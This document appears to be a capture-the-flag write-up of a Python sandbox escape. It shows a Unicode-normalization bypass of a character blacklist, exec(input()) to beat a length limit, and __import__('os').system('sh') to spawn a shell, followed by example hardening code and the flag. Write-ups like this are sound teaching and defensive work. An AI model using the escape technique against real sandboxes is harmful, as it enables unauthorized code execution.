ctf-writeup/2023/h4ckc0n 2023/yet another pyjail
daffainfo e6c48e50f1 feat: grouped the challs 2024-01-09 16:59:32 +07:00

yet another pyjail

CTFs without jails are boooring, innit?

About the Challenge

This is a classic PyJail challenge where we need to escape from the sandbox to obtain the flag. We are given a Python file that looks like this:

import ast, code, sys
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFHJKLMNOPQRSTUVWXYZ1234567890" 

entry=r"""
Welcome, enjoy your stay...

     \                  ###########                  /
      \                  #########                  /
       \                                           /
        \                                         /
         \                                       /
          \                                     /
           \                                   /
            \_________________________________/
            |                                 |
            |                                 |
            |                                 |
            |            _________            |
            |           |         |           |
            |           |   ___   |           |
            |           I  |___|  |           |
            |           |         |           |
            |           |         |           |
            |           |        _|           |
            |           |       |#|           |  ;,
    -- ___  |           |         |           |   ;'
    H*/   ` |           |         |      _____|    .,`
    */     )|           I         |     \_____\     ;'
    /___.,';|           |         |     \\     \     ."`
    |     ; |___________|_________|______\\     \      ;:
    | ._,'  /                             \\     \      .
    |,'    /                               \\     \
    ||    /                                 \\_____\
    ||   /                                   \_____|
    ||  /              ___________                \
    || /              / =====o    |                \
    ||/              /  |   /-\   |                 \
    //              /   |         |                  \
   //              /    |   ____  |______             \
  //              /    (O) |    | |      \             \
 //              /         |____| |  0    \             \
//              /          o----  |________\             \
/              /                  |     |  |              \
              /                   |        |               \
             /                    |        |             
            /                     |        |

"""

bye = """
Goodbye.


        _.---,._,'
       /' _.--.<
         /'     `'
       /' _.---._____
       \.'   ___, .-'`
           /'    \\             
         /'       `-.          
        |                       
        |                   .-'~~~`-.
        |                 .'         `.
        |                 |  R  I  P  |
        |                 |           |
        |                 |           |
         \               \\|           |//
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"""

def console_exit():
    print(bye)
    raise SystemExit

def read_input(args):
    inp = input('>>> ') 
    if len(inp) > 20:
        print("input too long")
        exit()
    if "Attribute" in ast.dump(ast.parse(inp)):
        print("no attribute access allowed")
        exit()
    if "Subscript" in ast.dump(ast.parse(inp)):
        print("no indexing allowed")
        exit()
    for i in blacklist:
        if i in inp:
            print("input contained blaclisted characters")
            exit()
    return inp

while True:
    print(entry)
    try:
        code.interact(banner="", exitmsg=None, local={"exit": console_exit}, readfunc=read_input)
    except SystemExit:
        break
    print(bye)
    break

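There are some restrictions: the input can't contain a-zA-Z0-9 (the characters in blacklist), it is rejected when len(input) > 20, and the AST checks reject attribute access and indexing.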

How to Solve?

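We can still bypass the blacklist by writing the code in a gothic (Fraktur) or cursive Unicode font: the blacklist compares raw characters, while Python normalizes identifiers to NFKC when parsing, so these letters are read as their ASCII equivalents. Then run this code to bypass the length restriction, since the second line it reads does not go through the filter: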

𝔢𝔵𝔢𝔠(𝔦𝔫𝔭𝔲𝔱())

Then, at the resulting input prompt, use __import__ to import the os module and spawn a shell:

__import__("os").system("sh")

To read the flag, run this shell command:

cat flag.txt
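Why the filter accepts the first-stage input, and what a stricter check looks like, as an added example that is not part of the original writeup or the challenge code. `original_filter_accepts` re-implements the checks in `read_input` above; `hardened_filter_accepts` and its name allowlist are hypothetical.

```python
import ast
import unicodedata

# Blacklist copied from the challenge source on this page.
BLACKLIST = "abcdefghijklmnopqrstuvwxyzABCDEFHJKLMNOPQRSTUVWXYZ1234567890"

def original_filter_accepts(inp):
    """Same checks as read_input(), returning a bool instead of exiting."""
    if len(inp) > 20:
        return False
    dump = ast.dump(ast.parse(inp))
    if "Attribute" in dump or "Subscript" in dump:
        return False
    return not any(ch in BLACKLIST for ch in inp)

def names_seen_by_compiler(inp):
    """Identifiers as the parser stores them, i.e. after NFKC normalization."""
    tree = ast.parse(inp)
    return sorted({n.id for n in ast.walk(tree) if isinstance(n, ast.Name)})

def hardened_filter_accepts(inp, allowed_names=frozenset({"exit"})):
    """Hypothetical stricter check: ASCII only, NFKC-stable, allowlisted names."""
    if len(inp) > 20 or not inp.isascii():
        return False
    if unicodedata.normalize("NFKC", inp) != inp:
        return False
    try:
        tree = ast.parse(inp)
    except SyntaxError:
        return False
    banned = (ast.Attribute, ast.Subscript, ast.Import, ast.ImportFrom)
    for node in ast.walk(tree):
        if isinstance(node, banned):
            return False
        # Compare the normalized identifier, not the raw characters.
        if isinstance(node, ast.Name) and node.id not in allowed_names:
            return False
    return True

def fraktur(word):
    """Map a-z to Mathematical Fraktur small letters (U+1D51E is 'a')."""
    return "".join(chr(0x1D51E + ord(c) - ord("a")) for c in word)

# The first-stage input from the writeup, rebuilt from code points.
PAYLOAD = f"{fraktur('exec')}({fraktur('input')}())"

if __name__ == "__main__":
    print("original filter accepts:", original_filter_accepts(PAYLOAD))
    print("names after parsing:    ", names_seen_by_compiler(PAYLOAD))
    print("hardened filter accepts:", hardened_filter_accepts(PAYLOAD))
```

The character blacklist and the parser disagree about what the input says; checking the parsed names against an allowlist removes that gap.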

flag

d4rk{1n_1996_4ndy_dufr35n3_35c4p3d_fr0m_5h4w5h4nk_pr150n}c0de